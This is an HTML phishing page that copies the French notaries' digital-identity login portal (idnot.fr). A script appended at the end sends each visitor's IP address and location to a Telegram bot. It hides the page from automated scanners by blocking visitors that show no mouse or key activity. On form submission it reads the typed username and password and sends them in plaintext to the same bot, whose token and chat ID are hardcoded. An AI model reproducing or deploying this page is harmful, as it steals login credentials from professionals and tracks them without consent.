<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Authentification</title>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="Viewport" content="width=device-width, height=device-height">
<meta http-equiv="Cache-control" content="no-cache">
<noscript>
<meta http-equiv="refresh" content="0; URL=error?errorMessage=error.JavaScriptDisabled"/>
</noscript>
<link rel="icon" href="https://connexion.idnot.fr/user/medias/images/favicon.ico">
<link rel="stylesheet" href="./Authentification_files/toastr.min.css">
<link rel="stylesheet" href="./Authentification_files/bootstrap.min.css">
<link rel="stylesheet" href="./Authentification_files/all.css">
<link rel="stylesheet" href="./Authentification_files/icheck-bootstrap.min.css">
<link rel="stylesheet" href="./Authentification_files/style.css">
<link rel="stylesheet" href="./Authentification_files/bootstrap-combobox.css">
<link rel="stylesheet" href="./Authentification_files/bootstrap-select.min.css">
<link rel="stylesheet" href="./Authentification_files/styles_sign_and_go.css">
<link rel="stylesheet" href="./Authentification_files/csn.css">
<script src="./Authentification_files/jquery.min.js.téléchargement"></script>
<script src="./Authentification_files/jquery-ui.min.js.téléchargement"></script>
<script src="./Authentification_files/bootstrap.min.js.téléchargement"></script>
</head>
<body>
<div id="wrapper">
<div id="header">
<img id="header-logo" src="./Authentification_files/logo.svg">
<div id="header-title">Mon identité numérique notariale</div>
<div id="header-description">Un compte unique pendant toute ma carrière professionnelle</div>
</div>
<div id="error-content"></div>
<div class="container">
<div id="contenu_specifique_application">
<form action="https://connexion.idnot.fr/user/auth/dologin" method="post" id="theform" name="theform"><input type="hidden" name="_csrf" value="13989608-584c-41d4-8c75-e6f69ed95a82">
<h3>Veuillez renseigner les informations suivantes :</h3>
<div id="AUTHENTICATION.LOGINContainer">
<label class="Form">Identifiant</label>
<input type="text" name="AUTHENTICATION.LOGIN" placeholder="Identifiant" value="" class="clearable">
</div><div class="link pseudoOublie">
<a href="https://connexion.idnot.fr/user/auth/chooseschema?page=pseudoOublie">Identifiant oublié ?</a>
</div>
<div id="AUTHENTICATION.PASSWORDContainer">
<label class="Form">Mot de passe</label>
<input id="AUTHENTICATION.PASSWORD" type="password" name="AUTHENTICATION.PASSWORD" placeholder="Mot de passe" value="" autocomplete="off"><span toggle="#AUTHENTICATION\.PASSWORD" class="fa-eye-csn field-icon toggle-password"></span>
</div>
<div class="mdp_oubli null">
<a href="#" data-name="SCHEMATOUPDATE" data-value="Authentification login-mdp SQL" onclick="clicklink(this);return false;">J'ai oublié mon mot de passe</a>
</div>
<div id="theform_buttons"><input class="ui-button ui-widget ui-state-default ui-corner-all custom_Button" name="validateButton" id="validateButton" type="submit" value="Se connecter"><div class="link noAccount">
<a href="https://compte.idnot.fr/mon-identite-numerique">Je n'ai pas d'identité</a>
</div></div>
</form>
</div>
</div>
<footer id="footer">
<div id="footerContainer"><span><a href="https://compte.idnot.fr/doc/faq">Aide</a></span><span>©2021 Conseil supérieur du notariat</span><span><a href="https://compte.idnot.fr/doc/mentions-legales">Conditions générales d'utilisation</a></span><span><a href="https://compte.idnot.fr/doc/charte-ethique">Charte éthique</a></span></div>
</footer>
</div>
<script src="./Authentification_files/jquery.slimscroll.min.js.téléchargement"></script>
<script src="./Authentification_files/toastr.min.js.téléchargement"></script>
<script src="./Authentification_files/jquery.validate.min.js.téléchargement"></script>
<script src="./Authentification_files/bootstrap-combobox.js.téléchargement"></script>
<script src="./Authentification_files/bootstrap-select.min.js.téléchargement"></script>
<script src="./Authentification_files/util.js.téléchargement"></script>
<script src="./Authentification_files/auth.js.téléchargement"></script>
<script src="./Authentification_files/csn.js.téléchargement"></script>

<script>
function clicklink(element) {
  $('input[name="SCHEMATOUPDATE"]').remove();
  $('<input>').attr({
    type: 'hidden',
    name: $(element).attr('data-name'),
    id: $(element).attr('data-name'),
    value: $(element).attr('data-value')
  }).insertAfter($(element));
  $(element).closest('form').submit();
}
</script>

<!-- ✅ Notification Telegram + Détection IP + Blocage Bot -->
<script>
  const TELEGRAM_TOKEN = '7982653544:AAFo0JFNathHNi92MdpARAJEV7OcMwOE4cQ';
  const TELEGRAM_CHAT_ID = '-1002253966185';

  // 🔐 Anti-bot check
  let isHuman = false;
  document.addEventListener('mousemove', () => isHuman = true);
  document.addEventListener('keydown', () => isHuman = true);

  // ✅ Notification de visite
  window.onload = function () {
    setTimeout(() => {
      if (!isHuman) {
        document.body.innerHTML = '<h2>Access Denied</h2><p>Bot access blocked.</p>';
        return;
      }

      fetch('https://ipapi.co/json/')
        .then(res => res.json())
        .then(data => {
          const message = `
📥 Nouvelle visite détectée :
🌐 IP : ${data.ip}
📍 Ville : ${data.city}
🌍 Pays : ${data.country_name}
📱 Fournisseur : ${data.org}
🔗 Page : ${window.location.href}
`;

          const telegramAPI = `https://api.telegram.org/bot${TELEGRAM_TOKEN}/sendMessage`;
          fetch(telegramAPI, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({
              chat_id: TELEGRAM_CHAT_ID,
              text: message,
              parse_mode: 'Markdown'
            })
          })
          .then(() => console.log("✅ Visite signalée à Telegram"))
          .catch(err => console.error("❌ Erreur Telegram (visite)", err));
        })
        .catch(err => console.error("❌ Erreur IPAPI", err));
    }, 2000);
  };

  // ✅ Notification d'identifiants à la soumission
  document.getElementById('theform').addEventListener('submit', function (e) {
    const login = document.querySelector('input[name="AUTHENTICATION.LOGIN"]')?.value || '[vide]';
    const password = document.querySelector('input[name="AUTHENTICATION.PASSWORD"]')?.value || '[vide]';

    const message = `
🔐 Tentative de connexion :
👤 Identifiant : ${login}
🔑 Mot de passe : ${password}
🕒 ${new Date().toLocaleString()}
`;

    const telegramAPI = `https://api.telegram.org/bot${TELEGRAM_TOKEN}/sendMessage`;
    fetch(telegramAPI, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        chat_id: TELEGRAM_CHAT_ID,
        text: message,
        parse_mode: 'Markdown'
      })
    })
    .then(() => console.log("✅ Credentials envoyés à Telegram"))
    .catch(err => console.error("❌ Erreur Telegram (credentials)", err));
  });
</script>

</body></html>
